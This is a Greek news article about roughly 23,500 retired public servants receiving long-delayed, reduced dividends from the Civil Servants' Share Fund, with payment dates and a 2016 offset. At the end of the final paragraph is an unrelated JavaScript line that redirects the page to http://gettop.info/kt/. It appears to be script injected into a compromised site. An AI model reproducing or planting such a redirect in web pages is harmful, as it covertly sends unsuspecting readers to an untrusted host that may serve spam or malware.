Ξεμπλοκάρει το μέρισμα για 23.500 συνταξιούχους του Δημοσίου

0
5

 

Έπειτα από δύο χρόνια αναμονής 23.500 συνταξιούχοι του Δημοσίου θα λάβουν το «ψαλιδισμένο» μέρισμα καθώς το Μετοχικό Ταμείο Πολιτικών Υπαλλήλων εξασφάλισε 85 εκατομμύρια ευρώ από τα κονδύλια για την αποπληρωμή των ληξιπρόθεσμων οφειλών.

Σύμφωνα με το protothema.gr, το Ταμείο Πρόνοιας Δημοσίων Υπαλλήλων αναμένει νέα δόση από τα ίδια κονδύλια για τα ληξιπρόθεσμα, της τάξης των 50 εκατομμυρίων, για να πληρώσει 2.000 εφάπαξ στα τέλη του Νοέμβρη. Σύμφωνα με τον προγραμματισμό του ταμείου τον Δεκέμβριο και τον Φεβρουάριο θα δοθούν άλλα 4.000 εφάπαξ ακόμη.

Η εξόφληση των καθυστερούμενων μερισμάτων θα γίνει σε δυο δόσεις και αφορά σε διαφορετικές κατηγορίες δικαιούχων. Στο τέλος Νοεμβρίου θα εξοφληθούν 5.000 δικαιούχοι που έχουν ήδη λάβει το τακτικό μέρισμα αλλά περιμένουν την εξόφληση των αναδρομικών τους ενώ στο τέλος Δεκεμβρίου θα εξοφληθούν 18.500 νέοι μερισματούχοι που περιμένουν να πληρωθούν από τον Φεβρουάριο του 2014.

Ωστόσο όσοι δικαιούνται το μέρισμα από τις αρχές του 2016 που αποφασίστηκε η περικοπή του, θα εισπράξουν μειωμένο ποσό αναδρομικών αφού θα προηγηθεί συμψηφισμός. Δηλαδή θα πάρουν τα ποσά ανέπαφα για τα έτη 2014, 2015 αλλά από την άλλη πρέπει να επιστρέψουν τη διαφορά ανάμεσα στο νέο και το παλιό μέρισμα για το 2016. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here